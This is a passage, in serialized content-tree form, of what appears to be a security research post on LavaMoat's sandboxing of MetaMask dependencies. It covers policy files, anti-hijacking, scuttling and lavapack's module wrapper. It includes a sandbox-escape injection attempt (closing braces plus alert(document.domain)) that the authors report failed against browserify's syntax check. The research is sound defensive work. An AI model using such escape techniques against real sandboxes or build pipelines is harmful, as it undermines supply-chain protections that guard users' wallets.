file",{"type":33,"value":4160},{"type":28,"tag":234,"props":46812,"children":46814},{"className":31015,"code":46813,"language":31017,"meta":7,"style":7},"   \"@metamask/providers\": {\n      \"globals\": {\n        \"Event\": true,\n        \"addEventListener\": true,\n        \"chrome.runtime.connect\": true,\n        \"console\": true,\n        \"dispatchEvent\": true,\n        \"document.createElement\": true,\n        \"document.readyState\": true,\n        \"ethereum\": \"write\",\n        \"location.hostname\": true,\n        \"removeEventListener\": true,\n        \"web3\": true\n      },\n      \"packages\": {\n        \"@metamask/object-multiplex\": true,\n        \"@metamask/providers>@metamask/safe-event-emitter\": true\n",[46815],{"type":28,"tag":98,"props":46816,"children":46817},{"__ignoreMap":7},[46818,46830,46845,46865,46884,46904,46924,46944,46964,46984,47005,47025,47044,47060,47067,47082,47102],{"type":28,"tag":116,"props":46819,"children":46820},{"class":245,"line":246},[46821,46826],{"type":28,"tag":116,"props":46822,"children":46823},{"style":563},[46824],{"type":33,"value":46825},"   \"@metamask/providers\"",{"type":28,"tag":116,"props":46827,"children":46828},{"style":266},[46829],{"type":33,"value":36646},{"type":28,"tag":116,"props":46831,"children":46832},{"class":245,"line":256},[46833,46837,46841],{"type":28,"tag":116,"props":46834,"children":46835},{"style":563},[46836],{"type":33,"value":36654},{"type":28,"tag":116,"props":46838,"children":46839},{"style":272},[46840],{"type":33,"value":4160},{"type":28,"tag":116,"props":46842,"children":46843},{"style":266},[46844],{"type":33,"value":1291},{"type":28,"tag":116,"props":46846,"children":46847},{"class":245,"line":293},[46848,46853,46857,46861],{"type":28,"tag":116,"props":46849,"children":46850},{"style":563},[46851],{"type":33,"value":46852},"        \"Event\"",{"type":28,"tag":116,"props":46854,"children":46855},{"style":272},[46856],{"type":33,"value":4160},{"type":28,"tag":116,"props":46858,"children":46859},{"style":376},[46860],{"type":33,"value":1129},{"type":28,"tag":116,"props":46862,"children":46863},{"style":266},[46864],{"type":33,"value":3178},{"type":28,"tag":116,"props":46866,"children":46867},{"class":245,"line":361},[46868,46872,46876,46880],{"type":28,"tag":116,"props":46869,"children":46870},{"style":563},[46871],{"type":33,"value":36706},{"type":28,"tag":116,"props":46873,"children":46874},{"style":272},[46875],{"type":33,"value":4160},{"type":28,"tag":116,"props":46877,"children":46878},{"style":376},[46879],{"type":33,"value":1129},{"type":28,"tag":116,"props":46881,"children":46882},{"style":266},[46883],{"type":33,"value":3178},{"type":28,"tag":116,"props":46885,"children":46886},{"class":245,"line":387},[46887,46892,46896,46900],{"type":28,"tag":116,"props":46888,"children":46889},{"style":563},[46890],{"type":33,"value":46891},"        \"chrome.runtime.connect\"",{"type":28,"tag":116,"props":46893,"children":46894},{"style":272},[46895],{"type":33,"value":4160},{"type":28,"tag":116,"props":46897,"children":46898},{"style":376},[46899],{"type":33,"value":1129},{"type":28,"tag":116,"props":46901,"children":46902},{"style":266},[46903],{"type":33,"value":3178},{"type":28,"tag":116,"props":46905,"children":46906},{"class":245,"line":400},[46907,46912,46916,46920],{"type":28,"tag":116,"props":46908,"children":46909},{"style":563},[46910],{"type":33,"value":46911},"        \"console\"",{"type":28,"tag":116,"props":46913,"children":46914},{"style":272},[46915],{"type":33,"value":4160},{"type":28,"tag":116,"props":46917,"children":46918},{"style":376},[46919],{"type":33,"value":1129},{"type":28,"tag":116,"props":46921,"children":46922},{"style":266},[46923],{"type":33,"value":3178},{"type":28,"tag":116,"props":46925,"children":46926},{"class":245,"line":614},[46927,46932,46936,46940],{"type":28,"tag":116,"props":46928,"children":46929},{"style":563},[46930],{"type":33,"value":46931},"        \"dispatchEvent\"",{"type":28,"tag":116,"props":46933,"children":46934},{"style":272},[46935],{"type":33,"value":4160},{"type":28,"tag":116,"props":46937,"children":46938},{"style":376},[46939],{"type":33,"value":1129},{"type":28,"tag":116,"props":46941,"children":46942},{"style":266},[46943],{"type":33,"value":3178},{"type":28,"tag":116,"props":46945,"children":46946},{"class":245,"line":631},[46947,46952,46956,46960],{"type":28,"tag":116,"props":46948,"children":46949},{"style":563},[46950],{"type":33,"value":46951},"        \"document.createElement\"",{"type":28,"tag":116,"props":46953,"children":46954},{"style":272},[46955],{"type":33,"value":4160},{"type":28,"tag":116,"props":46957,"children":46958},{"style":376},[46959],{"type":33,"value":1129},{"type":28,"tag":116,"props":46961,"children":46962},{"style":266},[46963],{"type":33,"value":3178},{"type":28,"tag":116,"props":46965,"children":46966},{"class":245,"line":665},[46967,46972,46976,46980],{"type":28,"tag":116,"props":46968,"children":46969},{"style":563},[46970],{"type":33,"value":46971},"        \"document.readyState\"",{"type":28,"tag":116,"props":46973,"children":46974},{"style":272},[46975],{"type":33,"value":4160},{"type":28,"tag":116,"props":46977,"children":46978},{"style":376},[46979],{"type":33,"value":1129},{"type":28,"tag":116,"props":46981,"children":46982},{"style":266},[46983],{"type":33,"value":3178},{"type":28,"tag":116,"props":46985,"children":46986},{"class":245,"line":713},[46987,46992,46996,47001],{"type":28,"tag":116,"props":46988,"children":46989},{"style":563},[46990],{"type":33,"value":46991},"        \"ethereum\"",{"type":28,"tag":116,"props":46993,"children":46994},{"style":272},[46995],{"type":33,"value":4160},{"type":28,"tag":116,"props":46997,"children":46998},{"style":563},[46999],{"type":33,"value":47000}," \"write\"",{"type":28,"tag":116,"props":47002,"children":47003},{"style":266},[47004],{"type":33,"value":3178},{"type":28,"tag":116,"props":47006,"children":47007},{"class":245,"line":750},[47008,47013,47017,47021],{"type":28,"tag":116,"props":47009,"children":47010},{"style":563},[47011],{"type":33,"value":47012},"        \"location.hostname\"",{"type":28,"tag":116,"props":47014,"children":47015},{"style":272},[47016],{"type":33,"value":4160},{"type":28,"tag":116,"props":47018,"children":47019},{"style":376},[47020],{"type":33,"value":1129},{"type":28,"tag":116,"props":47022,"children":47023},{"style":266},[47024],{"type":33,"value":3178},{"type":28,"tag":116,"props":47026,"children":47027},{"class":245,"line":779},[47028,47032,47036,47040],{"type":28,"tag":116,"props":47029,"children":47030},{"style":563},[47031],{"type":33,"value":36806},{"type":28,"tag":116,"props":47033,"children":47034},{"style":272},[47035],{"type":33,"value":4160},{"type":28,"tag":116,"props":47037,"children":47038},{"style":376},[47039],{"type":33,"value":1129},{"type":28,"tag":116,"props":47041,"children":47042},{"style":266},[47043],{"type":33,"value":3178},{"type":28,"tag":116,"props":47045,"children":47046},{"class":245,"line":796},[47047,47052,47056],{"type":28,"tag":116,"props":47048,"children":47049},{"style":563},[47050],{"type":33,"value":47051},"        \"web3\"",{"type":28,"tag":116,"props":47053,"children":47054},{"style":272},[47055],{"type":33,"value":4160},{"type":28,"tag":116,"props":47057,"children":47058},{"style":376},[47059],{"type":33,"value":46174},{"type":28,"tag":116,"props":47061,"children":47062},{"class":245,"line":847},[47063],{"type":28,"tag":116,"props":47064,"children":47065},{"style":266},[47066],{"type":33,"value":36823},{"type":28,"tag":116,"props":47068,"children":47069},{"class":245,"line":898},[47070,47074,47078],{"type":28,"tag":116,"props":47071,"children":47072},{"style":563},[47073],{"type":33,"value":36831},{"type":28,"tag":116,"props":47075,"children":47076},{"style":272},[47077],{"type":33,"value":4160},{"type":28,"tag":116,"props":47079,"children":47080},{"style":266},[47081],{"type":33,"value":1291},{"type":28,"tag":116,"props":47083,"children":47084},{"class":245,"line":907},[47085,47090,47094,47098],{"type":28,"tag":116,"props":47086,"children":47087},{"style":563},[47088],{"type":33,"value":47089},"        \"@metamask/object-multiplex\"",{"type":28,"tag":116,"props":47091,"children":47092},{"style":272},[47093],{"type":33,"value":4160},{"type":28,"tag":116,"props":47095,"children":47096},{"style":376},[47097],{"type":33,"value":1129},{"type":28,"tag":116,"props":47099,"children":47100},{"style":266},[47101],{"type":33,"value":3178},{"type":28,"tag":116,"props":47103,"children":47104},{"class":245,"line":981},[47105,47110,47114],{"type":28,"tag":116,"props":47106,"children":47107},{"style":563},[47108],{"type":33,"value":47109},"        \"@metamask/providers>@metamask/safe-event-emitter\"",{"type":28,"tag":116,"props":47111,"children":47112},{"style":272},[47113],{"type":33,"value":4160},{"type":28,"tag":116,"props":47115,"children":47116},{"style":376},[47117],{"type":33,"value":46174},{"type":28,"tag":29,"props":47119,"children":47120},{},[47121,47122,47127,47129,47134,47136,47142],{"type":33,"value":16275},{"type":28,"tag":98,"props":47123,"children":47125},{"className":47124},[],[47126],{"type":33,"value":36896},{"type":33,"value":47128}," section in a LavaMoat policy specifies which global variables and properties a module can access, setting permissions for its global scope interactions. Similarly, the ",{"type":28,"tag":98,"props":47130,"children":47132},{"className":47131},[],[47133],{"type":33,"value":36904},{"type":33,"value":47135}," section outlines the module's dependencies and the permissions or trust relationships with those dependencies. This defines how ",{"type":28,"tag":98,"props":47137,"children":47139},{"className":47138},[],[47140],{"type":33,"value":47141},"@metamask/providers",{"type":33,"value":47143}," interacts with other packages.",{"type":28,"tag":29,"props":47145,"children":47146},{},[47147,47149,47155],{"type":33,"value":47148},"To enforce these policies, LavaMoat uses ",{"type":28,"tag":98,"props":47150,"children":47152},{"className":47151},[],[47153],{"type":33,"value":47154},"lavapack",{"type":33,"value":47156},", a custom webpack that wraps ever dependency and applies the specified rules independently.",{"type":28,"tag":443,"props":47158,"children":47160},{"id":47159},"npm-anti-hijacking",[47161],{"type":33,"value":46777},{"type":28,"tag":29,"props":47163,"children":47164},{},[47165],{"type":33,"value":47166},"One important note is that Lavamoat can't rely solely on the names of the packages as they are published on NPM. Otherwise, a malicious actor could create a package with the same name as a popular, trusted package.",{"type":28,"tag":29,"props":47168,"children":47169},{},[47170,47172,47179],{"type":33,"value":47171},"Instead, Lavamoat looks at how each package is connected by ",{"type":28,"tag":87,"props":47173,"children":47176},{"href":47174,"rel":47175},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/walk.js#L22",[91],[47177],{"type":33,"value":47178},"walking the modules",{"type":33,"value":47180}," in a project's dependency tree, thus generating a unique name for each package.",{"type":28,"tag":443,"props":47182,"children":47184},{"id":47183},"scuttling",[47185],{"type":33,"value":46782},{"type":28,"tag":29,"props":47187,"children":47188},{},[47189,47191,47197],{"type":33,"value":47190},"Scuttling is an optional feature that adds an extra layer of protection. Even if the real ",{"type":28,"tag":98,"props":47192,"children":47194},{"className":47193},[],[47195],{"type":33,"value":47196},"GlobalThis",{"type":33,"value":47198}," object is leaked by an attacker or accessed through a malicious package manager, scuttling removes sensitive APIs, preventing malicious requests from being executed.",{"type":28,"tag":29,"props":47200,"children":47201},{},[47202,47204,47210],{"type":33,"value":47203},"For example, ",{"type":28,"tag":87,"props":47205,"children":47208},{"href":47206,"rel":47207},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L57",[91],[47209],{"type":33,"value":2039},{"type":33,"value":47211}," we see how Lavamoat checks if the feature is enabled after the root package compartment is created:",{"type":28,"tag":234,"props":47213,"children":47215},{"className":31015,"code":47214,"language":31017,"meta":7,"style":7},"    if (scuttleOpts.enabled) {\n      if (!Array.isArray(scuttleOpts.exceptions)) {\n        throw new Error(`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"${typeof scuttleOpts.exceptions}\"`)\n      }\n      scuttleOpts.scuttlerFunc(globalRef, realm => performScuttleGlobalThis(realm, scuttleOpts.exceptions))\n    }\n",[47216],{"type":28,"tag":98,"props":47217,"children":47218},{"__ignoreMap":7},[47219,47248,47298,47357,47364,47436],{"type":28,"tag":116,"props":47220,"children":47221},{"class":245,"line":246},[47222,47226,47230,47235,47239,47244],{"type":28,"tag":116,"props":47223,"children":47224},{"style":260},[47225],{"type":33,"value":11947},{"type":28,"tag":116,"props":47227,"children":47228},{"style":266},[47229],{"type":33,"value":269},{"type":28,"tag":116,"props":47231,"children":47232},{"style":272},[47233],{"type":33,"value":47234},"scuttleOpts",{"type":28,"tag":116,"props":47236,"children":47237},{"style":266},[47238],{"type":33,"value":141},{"type":28,"tag":116,"props":47240,"children":47241},{"style":272},[47242],{"type":33,"value":47243},"enabled",{"type":28,"tag":116,"props":47245,"children":47246},{"style":266},[47247],{"type":33,"value":844},{"type":28,"tag":116,"props":47249,"children":47250},{"class":245,"line":256},[47251,47255,47259,47263,47268,47272,47277,47281,47285,47289,47294],{"type":28,"tag":116,"props":47252,"children":47253},{"style":260},[47254],{"type":33,"value":2186},{"type":28,"tag":116,"props":47256,"children":47257},{"style":266},[47258],{"type":33,"value":269},{"type":28,"tag":116,"props":47260,"children":47261},{"style":370},[47262],{"type":33,"value":20285},{"type":28,"tag":116,"props":47264,"children":47265},{"style":272},[47266],{"type":33,"value":47267},"Array",{"type":28,"tag":116,"props":47269,"children":47270},{"style":266},[47271],{"type":33,"value":141},{"type":28,"tag":116,"props":47273,"children":47274},{"style":282},[47275],{"type":33,"value":47276},"isArray",{"type":28,"tag":116,"props":47278,"children":47279},{"style":266},[47280],{"type":33,"value":313},{"type":28,"tag":116,"props":47282,"children":47283},{"style":272},[47284],{"type":33,"value":47234},{"type":28,"tag":116,"props":47286,"children":47287},{"style":266},[47288],{"type":33,"value":141},{"type":28,"tag":116,"props":47290,"children":47291},{"style":272},[47292],{"type":33,"value":47293},"exceptions",{"type":28,"tag":116,"props":47295,"children":47296},{"style":266},[47297],{"type":33,"value":34820},{"type":28,"tag":116,"props":47299,"children":47300},{"class":245,"line":293},[47301,47306,47310,47314,47318,47323,47327,47331,47336,47340,47344,47348,47353],{"type":28,"tag":116,"props":47302,"children":47303},{"style":260},[47304],{"type":33,"value":47305},"        throw",{"type":28,"tag":116,"props":47307,"children":47308},{"style":376},[47309],{"type":33,"value":31582},{"type":28,"tag":116,"props":47311,"children":47312},{"style":282},[47313],{"type":33,"value":39903},{"type":28,"tag":116,"props":47315,"children":47316},{"style":266},[47317],{"type":33,"value":313},{"type":28,"tag":116,"props":47319,"children":47320},{"style":563},[47321],{"type":33,"value":47322},"`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"",{"type":28,"tag":116,"props":47324,"children":47325},{"style":376},[47326],{"type":33,"value":867},{"type":28,"tag":116,"props":47328,"children":47329},{"style":376},[47330],{"type":33,"value":31054},{"type":28,"tag":116,"props":47332,"children":47333},{"style":272},[47334],{"type":33,"value":47335}," scuttleOpts",{"type":28,"tag":116,"props":47337,"children":47338},{"style":370},[47339],{"type":33,"value":141},{"type":28,"tag":116,"props":47341,"children":47342},{"style":272},[47343],{"type":33,"value":47293},{"type":28,"tag":116,"props":47345,"children":47346},{"style":376},[47347],{"type":33,"value":885},{"type":28,"tag":116,"props":47349,"children":47350},{"style":563},[47351],{"type":33,"value":47352},"\"`",{"type":28,"tag":116,"props":47354,"children":47355},{"style":266},[47356],{"type":33,"value":2830},{"type":28,"tag":116,"props":47358,"children":47359},{"class":245,"line":361},[47360],{"type":28,"tag":116,"props":47361,"children":47362},{"style":266},[47363],{"type":33,"value":2444},{"type":28,"tag":116,"props":47365,"children":47366},{"class":245,"line":387},[47367,47372,47376,47381,47385,47390,47394,47399,47403,47408,47412,47416,47420,47424,47428,47432],{"type":28,"tag":116,"props":47368,"children":47369},{"style":272},[47370],{"type":33,"value":47371},"      scuttleOpts",{"type":28,"tag":116,"props":47373,"children":47374},{"style":266},[47375],{"type":33,"value":141},{"type":28,"tag":116,"props":47377,"children":47378},{"style":282},[47379],{"type":33,"value":47380},"scuttlerFunc",{"type":28,"tag":116,"props":47382,"children":47383},{"style":266},[47384],{"type":33,"value":313},{"type":28,"tag":116,"props":47386,"children":47387},{"style":272},[47388],{"type":33,"value":47389},"globalRef",{"type":28,"tag":116,"props":47391,"children":47392},{"style":266},[47393],{"type":33,"value":825},{"type":28,"tag":116,"props":47395,"children":47396},{"style":272},[47397],{"type":33,"value":47398},"realm",{"type":28,"tag":116,"props":47400,"children":47401},{"style":376},[47402],{"type":33,"value":1418},{"type":28,"tag":116,"props":47404,"children":47405},{"style":282},[47406],{"type":33,"value":47407}," performScuttleGlobalThis",{"type":28,"tag":116,"props":47409,"children":47410},{"style":266},[47411],{"type":33,"value":313},{"type":28,"tag":116,"props":47413,"children":47414},{"style":272},[47415],{"type":33,"value":47398},{"type":28,"tag":116,"props":47417,"children":47418},{"style":266},[47419],{"type":33,"value":825},{"type":28,"tag":116,"props":47421,"children":47422},{"style":272},[47423],{"type":33,"value":47234},{"type":28,"tag":116,"props":47425,"children":47426},{"style":266},[47427],{"type":33,"value":141},{"type":28,"tag":116,"props":47429,"children":47430},{"style":272},[47431],{"type":33,"value":47293},{"type":28,"tag":116,"props":47433,"children":47434},{"style":266},[47435],{"type":33,"value":19376},{"type":28,"tag":116,"props":47437,"children":47438},{"class":245,"line":400},[47439],{"type":28,"tag":116,"props":47440,"children":47441},{"style":266},[47442],{"type":33,"value":3025},{"type":28,"tag":29,"props":47444,"children":47445},{},[47446,47448,47454,47456,47462],{"type":33,"value":47447},"Subsequently, the code defines a ",{"type":28,"tag":87,"props":47449,"children":47452},{"href":47450,"rel":47451},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L74",[91],[47453],{"type":33,"value":830},{"type":33,"value":47455}," called ",{"type":28,"tag":98,"props":47457,"children":47459},{"className":47458},[],[47460],{"type":33,"value":47461},"generateScuttleOpts",{"type":33,"value":47463}," that creates and returns an options object.",{"type":28,"tag":29,"props":47465,"children":47466},{},[47467,47469,47475,47476,47482,47484,47489,47491,47497],{"type":33,"value":47468},"Finally, the ",{"type":28,"tag":98,"props":47470,"children":47472},{"className":47471},[],[47473],{"type":33,"value":47474},"performScuttleGlobalThis",{"type":33,"value":6129},{"type":28,"tag":87,"props":47477,"children":47480},{"href":47478,"rel":47479},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L125",[91],[47481],{"type":33,"value":830},{"type":33,"value":47483}," modifies the properties of the global object (",{"type":28,"tag":98,"props":47485,"children":47487},{"className":47486},[],[47488],{"type":33,"value":47389},{"type":33,"value":47490},"). It starts by creating an array ",{"type":28,"tag":98,"props":47492,"children":47494},{"className":47493},[],[47495],{"type":33,"value":47496},"props",{"type":33,"value":47498},", containing the names of all properties in the prototype chain of globalRef. Then, an empty object is then created to serve as a proxy for scuttled properties. The function then iterates over each property, making changes to the global window object based on the provided configuration.",{"type":28,"tag":63,"props":47500,"children":47502},{"id":47501},"hacking-webpacks",[47503],{"type":33,"value":47504},"Hacking Webpacks",{"type":28,"tag":29,"props":47506,"children":47507},{},[47508],{"type":33,"value":47509},"Now let's get to the fun stuff.",{"type":28,"tag":29,"props":47511,"children":47512},{},[47513],{"type":33,"value":47514},"Webpack is used to bundle all modules and packages into a single file. It inserts all the code of these modules into the bundle file. Checking Lavapack source code, we can see how this actually happens.",{"type":28,"tag":234,"props":47516,"children":47518},{"className":31015,"code":47517,"language":31017,"meta":7,"style":7},"  const filename = encodeURI(String(moduleData.file))\n  let moduleWrapperSource\n  if (bundleWithPrecompiledModules) {\n    moduleWrapperSource = `function(){\n      with (this.scopeTerminator) {\n        with (this.globalThis) {\n          return function() {\n            'use strict';\n            // source: ${filename}\n            return function (require, module, exports) {\n              __MODULE_CONTENT__\n            };\n          };\n        }\n      }\n    }`\n",[47519],{"type":28,"tag":98,"props":47520,"children":47521},{"__ignoreMap":7},[47522,47574,47586,47606,47623,47631,47639,47647,47655,47676,47684,47692,47699,47706,47713,47720],{"type":28,"tag":116,"props":47523,"children":47524},{"class":245,"line":246},[47525,47529,47534,47538,47543,47547,47552,47556,47561,47565,47570],{"type":28,"tag":116,"props":47526,"children":47527},{"style":376},[47528],{"type":33,"value":35814},{"type":28,"tag":116,"props":47530,"children":47531},{"style":272},[47532],{"type":33,"value":47533}," filename",{"type":28,"tag":116,"props":47535,"children":47536},{"style":370},[47537],{"type":33,"value":2226},{"type":28,"tag":116,"props":47539,"children":47540},{"style":282},[47541],{"type":33,"value":47542}," encodeURI",{"type":28,"tag":116,"props":47544,"children":47545},{"style":266},[47546],{"type":33,"value":313},{"type":28,"tag":116,"props":47548,"children":47549},{"style":282},[47550],{"type":33,"value":47551},"String",{"type":28,"tag":116,"props":47553,"children":47554},{"style":266},[47555],{"type":33,"value":313},{"type":28,"tag":116,"props":47557,"children":47558},{"style":272},[47559],{"type":33,"value":47560},"moduleData",{"type":28,"tag":116,"props":47562,"children":47563},{"style":266},[47564],{"type":33,"value":141},{"type":28,"tag":116,"props":47566,"children":47567},{"style":272},[47568],{"type":33,"value":47569},"file",{"type":28,"tag":116,"props":47571,"children":47572},{"style":266},[47573],{"type":33,"value":19376},{"type":28,"tag":116,"props":47575,"children":47576},{"class":245,"line":256},[47577,47581],{"type":28,"tag":116,"props":47578,"children":47579},{"style":376},[47580],{"type":33,"value":7527},{"type":28,"tag":116,"props":47582,"children":47583},{"style":272},[47584],{"type":33,"value":47585}," moduleWrapperSource\n",{"type":28,"tag":116,"props":47587,"children":47588},{"class":245,"line":293},[47589,47593,47597,47602],{"type":28,"tag":116,"props":47590,"children":47591},{"style":260},[47592],{"type":33,"value":31045},{"type":28,"tag":116,"props":47594,"children":47595},{"style":266},[47596],{"type":33,"value":269},{"type":28,"tag":116,"props":47598,"children":47599},{"style":272},[47600],{"type":33,"value":47601},"bundleWithPrecompiledModules",{"type":28,"tag":116,"props":47603,"children":47604},{"style":266},[47605],{"type":33,"value":844},{"type":28,"tag":116,"props":47607,"children":47608},{"class":245,"line":361},[47609,47614,47618],{"type":28,"tag":116,"props":47610,"children":47611},{"style":272},[47612],{"type":33,"value":47613},"    moduleWrapperSource",{"type":28,"tag":116,"props":47615,"children":47616},{"style":370},[47617],{"type":33,"value":2226},{"type":28,"tag":116,"props":47619,"children":47620},{"style":563},[47621],{"type":33,"value":47622}," `function(){\n",{"type":28,"tag":116,"props":47624,"children":47625},{"class":245,"line":387},[47626],{"type":28,"tag":116,"props":47627,"children":47628},{"style":563},[47629],{"type":33,"value":47630},"      with (this.scopeTerminator) {\n",{"type":28,"tag":116,"props":47632,"children":47633},{"class":245,"line":400},[47634],{"type":28,"tag":116,"props":47635,"children":47636},{"style":563},[47637],{"type":33,"value":47638},"        with (this.globalThis) {\n",{"type":28,"tag":116,"props":47640,"children":47641},{"class":245,"line":614},[47642],{"type":28,"tag":116,"props":47643,"children":47644},{"style":563},[47645],{"type":33,"value":47646},"          return function() {\n",{"type":28,"tag":116,"props":47648,"children":47649},{"class":245,"line":631},[47650],{"type":28,"tag":116,"props":47651,"children":47652},{"style":563},[47653],{"type":33,"value":47654},"            'use strict';\n",{"type":28,"tag":116,"props":47656,"children":47657},{"class":245,"line":665},[47658,47663,47667,47672],{"type":28,"tag":116,"props":47659,"children":47660},{"style":563},[47661],{"type":33,"value":47662},"            // source: ",{"type":28,"tag":116,"props":47664,"children":47665},{"style":376},[47666],{"type":33,"value":867},{"type":28,"tag":116,"props":47668,"children":47669},{"style":272},[47670],{"type":33,"value":47671},"filename",{"type":28,"tag":116,"props":47673,"children":47674},{"style":376},[47675],{"type":33,"value":406},{"type":28,"tag":116,"props":47677,"children":47678},{"class":245,"line":713},[47679],{"type":28,"tag":116,"props":47680,"children":47681},{"style":563},[47682],{"type":33,"value":47683},"            return function (require, module, exports) {\n",{"type":28,"tag":116,"props":47685,"children":47686},{"class":245,"line":750},[47687],{"type":28,"tag":116,"props":47688,"children":47689},{"style":563},[47690],{"type":33,"value":47691},"              __MODULE_CONTENT__\n",{"type":28,"tag":116,"props":47693,"children":47694},{"class":245,"line":779},[47695],{"type":28,"tag":116,"props":47696,"children":47697},{"style":563},[47698],{"type":33,"value":1378},{"type":28,"tag":116,"props":47700,"children":47701},{"class":245,"line":796},[47702],{"type":28,"tag":116,"props":47703,"children":47704},{"style":563},[47705],{"type":33,"value":8374},{"type":28,"tag":116,"props":47707,"children":47708},{"class":245,"line":847},[47709],{"type":28,"tag":116,"props":47710,"children":47711},{"style":563},[47712],{"type":33,"value":1954},{"type":28,"tag":116,"props":47714,"children":47715},{"class":245,"line":898},[47716],{"type":28,"tag":116,"props":47717,"children":47718},{"style":563},[47719],{"type":33,"value":2444},{"type":28,"tag":116,"props":47721,"children":47722},{"class":245,"line":907},[47723],{"type":28,"tag":116,"props":47724,"children":47725},{"style":563},[47726],{"type":33,"value":47727},"    }`\n",{"type":28,"tag":29,"props":47729,"children":47730},{},[47731,47733,47739,47741,47747],{"type":33,"value":47732},"Lavapack uses ",{"type":28,"tag":98,"props":47734,"children":47736},{"className":47735},[],[47737],{"type":33,"value":47738},"with()",{"type":33,"value":47740}," proxies to restrict the objects accessible by the module, and ",{"type":28,"tag":98,"props":47742,"children":47744},{"className":47743},[],[47745],{"type":33,"value":47746},"__MODULE_CONTENT__",{"type":33,"value":47748}," is replaced by the content of a file required by the project being built.",{"type":28,"tag":75,"props":47750,"children":47752},{"id":47751},"injection-not-so-simple",[47753],{"type":33,"value":47754},"Injection? Not So Simple",{"type":28,"tag":29,"props":47756,"children":47757},{},[47758,47760,47765],{"type":33,"value":47759},"We first tried to inject invalid javascript inside a javascript file, and then attempt to escape the ",{"type":28,"tag":98,"props":47761,"children":47763},{"className":47762},[],[47764],{"type":33,"value":12318},{"type":33,"value":47766}," environment:",{"type":28,"tag":234,"props":47768,"children":47770},{"className":31015,"code":47769,"language":31017,"meta":7,"style":7},"   } // end function 1\n  } // end function 2\n } // end with 1\n} // end with 2\n\nalert(document.domain)\n",[47771],{"type":28,"tag":98,"props":47772,"children":47773},{"__ignoreMap":7},[47774,47787,47799,47811,47823,47830],{"type":28,"tag":116,"props":47775,"children":47776},{"class":245,"line":246},[47777,47782],{"type":28,"tag":116,"props":47778,"children":47779},{"style":266},[47780],{"type":33,"value":47781},"   } ",{"type":28,"tag":116,"props":47783,"children":47784},{"style":250},[47785],{"type":33,"value":47786},"// end function 1\n",{"type":28,"tag":116,"props":47788,"children":47789},{"class":245,"line":256},[47790,47794],{"type":28,"tag":116,"props":47791,"children":47792},{"style":266},[47793],{"type":33,"value":31119},{"type":28,"tag":116,"props":47795,"children":47796},{"style":250},[47797],{"type":33,"value":47798},"// end function 2\n",{"type":28,"tag":116,"props":47800,"children":47801},{"class":245,"line":293},[47802,47806],{"type":28,"tag":116,"props":47803,"children":47804},{"style":266},[47805],{"type":33,"value":35828},{"type":28,"tag":116,"props":47807,"children":47808},{"style":250},[47809],{"type":33,"value":47810},"// end with 1\n",{"type":28,"tag":116,"props":47812,"children":47813},{"class":245,"line":361},[47814,47818],{"type":28,"tag":116,"props":47815,"children":47816},{"style":266},[47817],{"type":33,"value":46499},{"type":28,"tag":116,"props":47819,"children":47820},{"style":250},[47821],{"type":33,"value":47822},"// end with 2\n",{"type":28,"tag":116,"props":47824,"children":47825},{"class":245,"line":387},[47826],{"type":28,"tag":116,"props":47827,"children":47828},{"emptyLinePlaceholder":19},[47829],{"type":33,"value":1044},{"type":28,"tag":116,"props":47831,"children":47832},{"class":245,"line":400},[47833,47837,47841,47845,47849,47853],{"type":28,"tag":116,"props":47834,"children":47835},{"style":282},[47836],{"type":33,"value":32336},{"type":28,"tag":116,"props":47838,"children":47839},{"style":266},[47840],{"type":33,"value":313},{"type":28,"tag":116,"props":47842,"children":47843},{"style":272},[47844],{"type":33,"value":1156},{"type":28,"tag":116,"props":47846,"children":47847},{"style":266},[47848],{"type":33,"value":141},{"type":28,"tag":116,"props":47850,"children":47851},{"style":272},[47852],{"type":33,"value":32355},{"type":28,"tag":116,"props":47854,"children":47855},{"style":266},[47856],{"type":33,"value":2830},{"type":28,"tag":29,"props":47858,"children":47859},{},[47860,47862,47868,47870,47877],{"type":33,"value":47861},"However, when we tried to bundle it, a ",{"type":28,"tag":98,"props":47863,"children":47865},{"className":47864},[],[47866],{"type":33,"value":47867},"ParseError",{"type":33,"value":47869}," was thrown. This is because Lavapack is a plugin of ",{"type":28,"tag":87,"props":47871,"children":47874},{"href":47872,"rel":47873},"https://github.com/browserify/browserify",[91],[47875],{"type":33,"value":47876},"browserify",{"type":33,"value":47878},", which has a syntax check before replacing the code.",{"type":28,"tag":29,"props":47880,"children":47881},{},[47882,47884,47890,47892,47898,47900,47906,47908,47913],{"type":33,"value":47883},"Looking deeper into browserify, we find it has a ",{"type":28,"tag":98,"props":47885,"children":47887},{"className":47886},[],[47888],{"type":33,"value":47889},"syntax",{"type":33,"value":47891}," stage on it's pipeline, and uses the ",{"type":28,"tag":98,"props":47893,"children":47895},{"className":47894},[],[47896],{"type":33,"value":47897},"syntax-error",{"type":33,"value":47899}," npm package to validate the syntax of each javascript file content. Since Lavapack replaces the ",{"type":28,"tag":98,"props":47901,"children":47903},{"className":47902},[],[47904],{"type":33,"value":47905},"pack",{"type":33,"value":47907}," stage on browserify pipeline, which comes after the ",{"type":28,"tag":98,"props":47909,"children":47911},{"className":47910},[],[47912],{"type":33,"value":47889},{"type":33,"value":47914},", it was not possible to inject invalid javascript to escape the Lavamoat sandbox.",{"type":28,"tag":29,"props":47916,"children":47917},{},[47918],{"type":28,"tag":206,"props":47919,"children":47922},{"alt":47920,"src":47921},"Pipeline","/posts/supply-chain-attacks-a-new-era/pipeline.png",[],{"type":28,"tag":29,"props":47924,"children":47925},{},[47926,47927,47932,47934,47939],{"type":33,"value":16275},{"type":28,"tag":98,"props":47928,"children":47930},{"className":47929},[],[47931],{"type":33,"value":47897},{"type":33,"value":47933}," package performs a syntax check by using  ",{"type":28,"tag":98,"props":47935,"children":47937},{"className":47936},[],[47938],{"type":33,"value":37171},{"type":33,"value":47940}," with function hoisting:",{"type":28,"tag":234,"props":47942,"children":47944},{"className":31015,"code":47943,"language":31017,"meta":7,"style":7},"try {\n    eval('throw \"STOP\"; (function () { ' + src + '\\n})()');\n    return;\n}\ncatch (err) {\n    if (err === 